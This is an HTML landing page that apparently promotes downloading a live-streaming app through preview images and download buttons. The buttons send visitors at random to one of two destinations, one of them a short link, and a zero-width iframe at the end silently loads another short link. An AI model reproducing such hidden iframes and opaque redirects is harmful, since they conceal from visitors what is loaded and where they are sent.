<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<style>html { overflow-x:hidden; }</style> 

<style>html { overflow-y:hidden; }
@media screen and (orientation: portrait) {
 .divbanner img{ width:230%;} 
	.divbanner {overflow:hidden}
 .download img{ width:30%;} 	
}
@media screen and (orientation: landscape) {
 .divbanner img{ width:105%;} 
	.divbanner {overflow:hidden}
 .download img{ 
	  position:fixed;
          top:9%;
          right: 16%;
	  width:0%;
	}
	
}
	
.inimg {width:670px;height:395px;white-space:nowrap;overflow-x:auto;overflow-y:hidden;} 
.inimg img {width:670px;height:375px;} 
	
</style>

<script>
function random_url()
{
	if(Math.random()>0.008)
window.location.href = "https://grepkweiwo.github.io/downloadpage/";
	else window.location.href = "https://biiy.cn/000PJz";
}
</script>
	
</head>

<body>

<div align="left" class="divbanner"> 
<img onclick="javascript:random_url();" style="cursor:pointer;" id="banner" src="https://showgirl.cdn.bcebos.com/优艺直播短右侧下载按钮.png"/>
</div >

<div align="right" class="download"> 
<img onclick="javascript:random_url();" style="cursor:pointer;" id="banner" src="https://showgirl.cdn.bcebos.com/下载按钮.png"/>
</div >	

<div class="inimg">
        <img src="https://showgirl.gz.bcebos.com/preview1o.jpg" _fcksavedurl="http://www.xker.com/Article/img2005/jc06081_2.jpg"
             alt="img" /> ["岁月联盟"提供]
        <img src="https://showgirl.gz.bcebos.com/preview2o.jpg" _fcksavedurl="http://www.xker.com/Article/img2005/jc06081_2.jpg"
             alt="img" />
        <img src="https://showgirl.gz.bcebos.com/preview3o.jpg" _fcksavedurl="http://www.xker.com/Article/img2005/jc06081_2.jpg"
             alt="img" />
        <img src="https://showgirl.gz.bcebos.com/preview4o.jpg" _fcksavedurl="http://www.xker.com/Article/img2005/jc06081_2.jpg"
             alt="img" />
</div>
	
	
<iframe class="iframe" id="imgexplain"  width="100%"  position="fixed" top="4px" frameborder="0" src="clearpreviewiframe.html"></iframe>
<div >
	<img   width="100%"  src="https://lovenight.cdn.bcebos.com/explainshow.jpg"/>
</div >
	
	<iframe class="iframe2" width="0%"   frameborder="0" src="https://biiy.cn/000PJU"></iframe>

</body>

	<script type="text/javascript"> 
	 var divpreview=document.getElementById("imgexplain");
        divpreview.style.height=parseInt(document.body.clientWidth)*1.1+"px";
        </script>
</html>
